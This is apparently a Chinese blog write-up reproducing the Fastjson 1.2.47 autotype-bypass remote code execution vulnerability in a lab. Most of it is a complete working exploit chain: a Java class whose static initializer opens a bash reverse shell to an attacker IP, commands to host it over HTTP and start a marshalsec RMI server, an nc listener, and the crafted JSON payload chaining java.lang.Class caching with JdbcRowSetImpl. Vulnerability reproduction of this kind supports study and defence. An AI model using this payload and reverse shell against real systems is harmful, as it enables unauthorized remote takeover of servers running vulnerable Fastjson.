Fastjson 1.2.47 RCE漏洞复现

一、漏洞特征
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过
影响版本:Fastjson <=1.2.47

访问http://192.168.232.131:8090/即可看到JSON格式的输出
Fastjson 1.2.47 RCE漏洞复现_第1张图片

修改用户信息发现有回显
Fastjson 1.2.47 RCE漏洞复现_第2张图片在这里插入图片描述

二、漏洞复现
1.编译java文件

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.245.2/2333 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

Ip改成自己攻击机的ip
javac C:\Users\Administrator\Desktop\TouchFile.java
2.开启http服务
把编译好的class文件传到外网系统中,并在class文件所在的目录,Python起一个http服务
python -m http.server 4444
在这里插入图片描述Fastjson 1.2.47 RCE漏洞复现_第3张图片

3.启动RMI服务
使用marshalsec项目,启动RMI服务,监听9999端口并加载远程类TouchFile.class
https://github.com/mbechler/marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://192.168.245.2:4444/#TouchFile” 9999
在这里插入图片描述

4.nc开启监听
另起一个终端开启监听(nc -lvnp 2333)
在这里插入图片描述

5.bp发送构造包
访问192.168.232.131:8090并用bp抓包,构造如下POST请求包
{
“a”:{
“@type”:“java.lang.Class”,
“val”:“com.sun.rowset.JdbcRowSetImpl”
},
“b”:{
“@type”:“com.sun.rowset.JdbcRowSetImpl”,
“dataSourceName”:“rmi://192.168.245.2:9999/TouchFile”,
“autoCommit”:true
}
}
Fastjson 1.2.47 RCE漏洞复现_第4张图片

6.反弹shell
执行后
在这里插入图片描述在这里插入图片描述Fastjson 1.2.47 RCE漏洞复现_第5张图片

注意:如果反弹失败看是不是主机ip搞错了,kali的时间对不对

你可能感兴趣的:(web安全)